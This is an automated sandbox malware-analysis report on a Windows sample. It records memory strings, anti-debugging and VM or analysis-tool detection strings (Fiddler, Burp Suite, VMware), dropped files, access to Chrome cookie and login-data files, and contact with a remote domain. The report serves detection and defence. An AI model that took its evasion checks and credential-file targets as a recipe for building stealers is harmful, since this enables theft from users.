DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}CC?
Source: aOn5CfTiwS.exe, 00000000.00000003.213561044.0000000002DF6000.00000004.00000040.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}U
Source: ecv71A3.tmp.1.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=31fc4362adbf4e51ac951f4816f7487c&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: aOn5CfTiwS.exe, 00000000.00000003.213541122.00000000022EF000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: See collectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatscollectCommentsallowCommentsstrictRootallowDroppedNullPlaceholdersallowNumericKeysallowSingleQuotesstackLimitfailIfExtrarejectDupKeysallowSpecialFloatsError from reader: %sbad allocationsessionurls_to_restore_on_startuptabnew_open_urlbad allocationAfx:400000:8:10003:0:WPETCPViewClassTStdHttpAnalyzerFormgdkWindowToplevelXTPMainFrameHTTP DebuggerTelerik FiddlerASExplorerSunAwtFrameCharlesBurp Suitebad allocationvmwarevirtualvboxDisplayLegacyDriverDiskDriveCDROMMousebad allocation=> Send header=> Send data=> Send SSL data<= Recv header<= Recv data<= Recv SSL data[OnDebug] text = %s
Source: aOn5CfTiwS.exe, 00000000.00000003.213534311.00000000022DE000.00000004.00000001.sdmp Binary or memory string: SWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00951C57
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040D071
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00958290 GetProcessHeap,HeapFree, 2_2_00958290
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095461F SetUnhandledExceptionFilter, 2_2_0095461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00951C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0095631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0095373A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA, 2_2_00957189
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A51E8 GetLocalTime,wsprintfA, 0_2_004A51E8
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A52D8 GetVersion,GetCurrentThreadId,EnumThreadWindows, 0_2_004A52D8
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Behavior Graph:

Behavior Graph ID: 346349
Sample: aOn5CfTiwS
Startdate: 30/01/2021
Architecture: WINDOWS
Score: 80

Signatures on the start node: Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; Machine Learning detection for sample; 2 other signatures

aOn5CfTiwS.exe (started)
  • DNS/IP: 1a469593c1fe15dc.xyz (198.54.117.244, ports 49719, 49722, 49724), NAMECHEAP-NETUS, United States
  • Dropped: C:\Users\user\AppData\...\1612058829275.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
  • Signatures: Detected unpacking (creates a PE file in dynamic memory); Installs new ROOT certificates; Tries to harvest and steal browser information (history, passwords, etc)
  • Started: cmd.exe; 1612058829275.exe; ThunderFW.exe

cmd.exe (started by aOn5CfTiwS.exe)
  • DNS/IP: 127.0.0.1 (unknown, unknown)
  • Signatures: Uses ping.exe to sleep
  • Started: conhost.exe; PING.EXE

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.117.244 | unknown | United States | 22612 | NAMECHEAP-NETUS | false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
1a469593c1fe15dc.xyz 198.54.117.244 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://1a469593c1fe15dc.xyz/info/fb | false | Avira URL Cloud: safe | unknown
http://1a469593c1fe15dc.xyz/info/step | false | Avira URL Cloud: safe | unknown
http://1a469593c1fe15dc.xyz/info/dd | false | Avira URL Cloud: safe | unknown